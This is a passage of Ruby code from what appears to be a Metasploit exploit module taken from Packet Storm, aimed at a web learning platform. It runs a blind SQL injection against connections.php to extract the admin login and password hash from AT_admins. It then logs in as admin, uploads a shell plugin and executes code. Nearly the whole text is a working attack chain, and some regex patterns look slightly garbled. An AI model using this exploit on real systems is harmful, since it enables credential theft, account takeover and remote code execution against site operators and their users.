send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, "mods", "_standard", "social", "connections.php"), 'vars_post' => { "search_friends_#{rand_key}" => sqli, 'rand_key' => rand_key, 'search' => 'Search People' }, 'cookie' => cookie, 'agent' => 'Mozilla' }) return res.body end def dump_the_hash(cookie) extracted_hash = "" sqli = "(select/**/length(concat(login,0x3a,password))/**/from/**/AT_admins/**/limit/**/0,1)" login_and_hash_length = generate_sql_and_test(do_true=false, do_test=false, sql=sqli, cookie).to_i for i in 1..login_and_hash_length sqli = "ascii(substring((select/**/concat(login,0x3a,password)/**/from/**/AT_admins/**/limit/**/0,1),#{i},1))" asciival = generate_sql_and_test(false, false, sqli, cookie) if asciival >= 0 extracted_hash << asciival.chr end end return extracted_hash.split(":") end def get_ascii_value(sql, cookie) lower = 0 upper = 126 while lower < upper mid = (lower + upper) / 2 sqli = "#{sql}>#{mid}" result = perform_request(sqli, cookie) if result =~ /There are d entries./ lower = mid + 1 else upper = mid end end if lower > 0 and lower < 126 value = lower else sqli = "#{sql}=#{lower}" result = perform_request(sqli, cookie) if result =~ /There are d entries./ value = lower end end return value end def generate_sql_and_test(do_true=false, do_test=false, sql=nil, cookie) if do_test if do_true result = perform_request("1=1", cookie) if result =~ /There are d entries./ return true end else not do_true result = perform_request("1=2", cookie) if not result =~ /There are d entries./ return true end end elsif not do_test and sql return get_ascii_value(sql, cookie) end end def test_injection(cookie) if generate_sql_and_test(do_true=true, do_test=true, sql=nil, cookie) if generate_sql_and_test(do_true=false, do_test=true, sql=nil, cookie) return true end end return false end def report_cred(opts) service_data = { address: rhost, port: rport, service_name: ssl ? 
'https' : 'http', protocol: 'tcp', workspace_id: myworkspace_id } credential_data = { module_fullname: fullname, post_reference_name: self.refname, private_data: opts[:password], origin_type: :service, private_type: :password, username: opts[:user] }.merge(service_data) login_data = { core: create_credential(credential_data), status: Metasploit::Model::Login::Status::SUCCESSFUL, last_attempted_at: Time.now }.merge(service_data) create_credential_login(login_data) end def exploit student_cookie = login(datastore['USERNAME'], datastore['PASSWORD'], false) print_status("Logged in as #{datastore['USERNAME']}, sending a few test injections...") report_cred(user: datastore['USERNAME'], password: datastore['PASSWORD']) print_status("Dumping username and password hash...") # we got admin hash now credz = dump_the_hash(student_cookie) print_good("Got the #{credz[0]} hash: #{credz[1]} !") if credz admin_cookie = login(credz[0], credz[1], true) print_status("Logged in as #{credz[0]}, uploading shell...") # install a plugin if upload_shell(admin_cookie) print_good("Shell upload successful!") # boom exec_code end end end end exploit source : packetstormsecurity.com